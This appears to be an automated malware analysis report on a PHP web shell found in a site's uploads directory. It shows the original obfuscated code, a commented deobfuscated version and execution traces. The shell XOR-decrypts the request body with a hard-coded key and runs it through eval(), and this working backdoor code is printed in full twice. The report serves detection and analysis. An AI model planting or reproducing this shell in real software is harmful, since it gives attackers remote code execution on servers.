PHP Malware Analysis

05199.php, shell.php

md5: 7da376a9148f84e5353cb9d11721935d


Attributes

Encoding

Environment

Execution

Files

Input


Deobfuscated PHP code

<?php

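@error_reporting(0); // suppress all error output
function Decrypt($data)
{
    // Hard-coded 16-byte XOR key
    $key = "e45e329feb5d925b";
    $bs = "base64_decode"; // unused here; the original calls base64_decode through this variable
    $after = base64_decode($data . "");
    for ($i = 0; $i < strlen($after); $i++) {
        // "+" binds tighter than "&", so the key index is ($i + 1) & 15.
        // Written as a plain assignment, as in the original: PHP rejects
        // compound assignment operators (^=) on string offsets.
        $after[$i] = $after[$i] ^ $key[$i + 1 & 15];
    }
    return $after;
}
// The raw request body is base64-decoded, XOR-decrypted and passed to eval()
$post = Decrypt(file_get_contents("php://input"));
eval($post);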

Execution traces

data/traces/7da376a9148f84e5353cb9d11721935d_trace-1676251421.2714.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:24:07.169230]
1	0	1	0.000168	393512
1	3	0	0.000242	396656	{main}	1		/var/www/html/uploads/shell.php	0	0
2	4	0	0.000259	396656	error_reporting	0		/var/www/html/uploads/shell.php	2	1	0
2	4	1	0.000274	396696
2	4	R			0
2	5	0	0.000288	396656	file_get_contents	0		/var/www/html/uploads/shell.php	13	1	'php://input'
2	5	1	0.000308	397392
2	5	R			''
2	6	0	0.000322	397352	Decrypt	1		/var/www/html/uploads/shell.php	13	1	''
2		A						/var/www/html/uploads/shell.php	5	$key = 'e45e329feb5d925b'
2		A						/var/www/html/uploads/shell.php	6	$bs = 'base64_decode'
3	7	0	0.000359	397352	base64_decode	0		/var/www/html/uploads/shell.php	7	1	''
3	7	1	0.000372	397416
3	7	R			''
2		A						/var/www/html/uploads/shell.php	7	$after = ''
2		A						/var/www/html/uploads/shell.php	8	$i = 0
2	6	1	0.000405	397384
2	6	R			''
1		A						/var/www/html/uploads/shell.php	13	$post = ''
1	3	1	0.000430	397416
			0.000454	316144
TRACE END   [2023-02-12 23:24:07.169547]

data/traces/7da376a9148f84e5353cb9d11721935d_trace-1676261873.7191.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:18:19.616903]
1	0	1	0.000157	393512
1	3	0	0.000228	396656	{main}	1		/var/www/html/uploads/05199.php	0	0
2	4	0	0.000245	396656	error_reporting	0		/var/www/html/uploads/05199.php	2	1	0
2	4	1	0.000261	396696
2	4	R			0
2	5	0	0.000275	396656	file_get_contents	0		/var/www/html/uploads/05199.php	13	1	'php://input'
2	5	1	0.000295	397392
2	5	R			''
2	6	0	0.000309	397352	Decrypt	1		/var/www/html/uploads/05199.php	13	1	''
2		A						/var/www/html/uploads/05199.php	5	$key = 'e45e329feb5d925b'
2		A						/var/www/html/uploads/05199.php	6	$bs = 'base64_decode'
3	7	0	0.000346	397352	base64_decode	0		/var/www/html/uploads/05199.php	7	1	''
3	7	1	0.000359	397416
3	7	R			''
2		A						/var/www/html/uploads/05199.php	7	$after = ''
2		A						/var/www/html/uploads/05199.php	8	$i = 0
2	6	1	0.000394	397384
2	6	R			''
1		A						/var/www/html/uploads/05199.php	13	$post = ''
1	3	1	0.000418	397416
			0.000444	316144
TRACE END   [2023-02-13 02:18:19.617222]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
@error_reporting(0);
	function Decrypt($data)
{
    $key="e45e329feb5d925b"; 
    $bs="base64_"."decode";
	$after=$bs($data."");
	for($i=0;$i<strlen($after);$i++) {
    	$after[$i] = $after[$i]^$key[$i+1&15]; 
    }
    return $after;
}
	$post=Decrypt(file_get_contents("php://input"));
    eval($post);
?>